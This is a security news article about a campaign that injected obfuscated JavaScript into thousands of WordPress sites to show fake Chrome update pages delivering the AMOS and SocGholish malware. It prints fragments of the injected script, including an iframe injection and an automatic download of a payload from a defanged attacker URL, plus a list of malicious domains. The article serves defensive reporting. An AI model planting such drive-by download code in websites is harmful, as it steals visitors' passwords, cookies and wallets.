A sophisticated cyberattack has compromised over 10,000 WordPress websites, delivering cross-platform malware to unsuspecting users.
The campaign exploits outdated WordPress versions and plugins, redirecting visitors to fake browser update pages that deploy malicious software targeting both macOS and Windows systems.
The attackers injected malicious JavaScript into compromised WordPress sites.
When a user visits one of these sites, the script dynamically generates an iframe displaying a fake Google Chrome update page.
.webp)
Experts at CSIDE found that the page prompts users to download what appears to be a legitimate update but is, in fact, malware.
The malware includes:-
- AMOS (Atomic macOS Stealer): A macOS-targeted infostealer designed to exfiltrate sensitive data like passwords, cookies, and cryptocurrency wallet information.
- SocGholish: A Windows-targeted malware framework that acts as a downloader for additional malicious payloads, including ransomware.
Technical Details & Malware Behavior
The malicious JavaScript is hosted on third-party domains such as https://deski.fastcloudcdn[.]com
. The script is highly obfuscated and employs multi-layered encoding to evade detection. Key technical components include:-
- Dynamic Script Injection:
;(function(o, q, f, e, w, j) {})();
- Browser Activity Interruption:
window.stop();
- Fake Update Page Injection:
let frame = document.createElement("iframe");
frame.srcdoc = rsd; // rsd contains the fake update page content
document.body.appendChild(frame);
- DNS Prefetching for Malicious Domains:
<link rel='dns-prefetch' href='//blacksaltys[.]com' />
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
- AMOS (macOS): Delivered as a
.dmg
file via dynamically generated download links. The following code snippet automates the download process:
var btn = document.createElement("a");
btn.href = `hxxps://extendedstaybrunswick[.]com/wp-content/plugins/res/C_6.12.4.dmg`;
btn.download = "C_6.12.4.dmg";
document.body.appendChild(btn);
btn.click();
- SocGholish (Windows): Distributed as a JavaScript payload embedded in fake update files. Once executed, it establishes command-and-control (C2) communication for further exploitation.
To mitigate these threats, website administrators should update WordPress core software and plugins, remove unused or outdated plugins and themes, and review logs from the past 90 days to detect unauthorized changes or script injections.
End users should avoid downloading browser updates from unknown sources and use the browser’s built-in update feature, conducting comprehensive system scans if any suspicious downloads occurred.
Additionally, employing advanced client-side monitoring tools and using endpoint protection solutions capable of detecting obfuscated scripts and malicious payloads can further enhance security.
Both AMOS and SocGholish are commercially available malware variants sold on platforms like Telegram which shows the growing commercialization of cybercrime.
Cybersecurity experts urge vigilance among website administrators and end-users alike to mitigate the risks posed by such large-scale campaigns.
Indicators of Compromise
Malicious domains identified include:-
blacksaltys[.]com
fetchdataajax[.]com
foundedbrounded[.]org
groundrats[.]org
leatherbook[.]org
loopconstruct[.]com
modernkeys[.]org
objmapper[.]com
packedbrick[.]com
promiseresolverdev[.]com
rednosehorse[.]com
smthwentwrong[.]com
variablescopetool[.]com
virtualdc[.]org
Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request